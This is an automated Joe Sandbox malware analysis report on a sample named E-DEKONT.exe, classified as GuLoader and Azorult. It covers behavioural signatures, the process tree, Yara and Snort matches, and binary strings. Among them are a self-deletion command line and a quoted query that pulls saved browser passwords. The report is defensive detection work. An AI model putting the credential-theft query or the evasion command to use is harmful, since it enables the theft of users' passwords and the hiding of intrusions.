Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E-DEKONT.exe

Overview

General Information

Sample Name:E-DEKONT.exe
Analysis ID:755881
MD5:0aa36eb080cf7171cec271b2cd4d2108
SHA1:eb7f3bf8e15ae16e765e480510d2260a9e9facb8
SHA256:6ca208edbc718f737f74ee0a631ed22cd2bf67a0db679d9d1702575c087550cc
Infos:

Detection

Azorult, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to enumerate device drivers
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • E-DEKONT.exe (PID: 3880 cmdline: C:\Users\user\Desktop\E-DEKONT.exe MD5: 0AA36EB080CF7171CEC271B2CD4D2108)
    • E-DEKONT.exe (PID: 4868 cmdline: C:\Users\user\Desktop\E-DEKONT.exe MD5: 0AA36EB080CF7171CEC271B2CD4D2108)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 2016 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.E-DEKONT.exe.1df8883c.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.2.E-DEKONT.exe.1df8883c.5.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
              • 0x32285c:$string1: SELECT origin_url, username_value, password_value FROM logins
              • 0x3269b7:$string1: SELECT origin_url, username_value, password_value FROM logins
              • 0x197172:$string2: API call with %s database connection pointer
              • 0x197da6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
              4.2.E-DEKONT.exe.1df32afc.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                4.2.E-DEKONT.exe.1df32afc.3.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
                • 0x37859c:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x37c6f7:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x1eceb2:$string2: API call with %s database connection pointer
                • 0x1edae6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
                4.2.E-DEKONT.exe.1df37450.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.11.20104.21.44.19449852802029468 11/29/22-09:20:38.942380
                  SID:2029468
                  Source Port:49852
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:104.21.44.194192.168.11.2080498522029137 11/29/22-09:20:40.337285
                  SID:2029137
                  Source Port:80
                  Destination Port:49852
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: E-DEKONT.exeVirustotal: Detection: 26%Perma Link
                  Source: E-DEKONT.exeReversingLabs: Detection: 20%
                  Source: E-DEKONT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\E-DEKONT.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\FouragenJump to behavior
                  Source: unknownHTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
                  Source: E-DEKONT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
                  Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
                  Source: Binary string: mshtml.pdbUGP source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108910928044.000000001DDD4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
                  Source: Binary string: msvcp140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: ucrtbase.pdbUGP source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
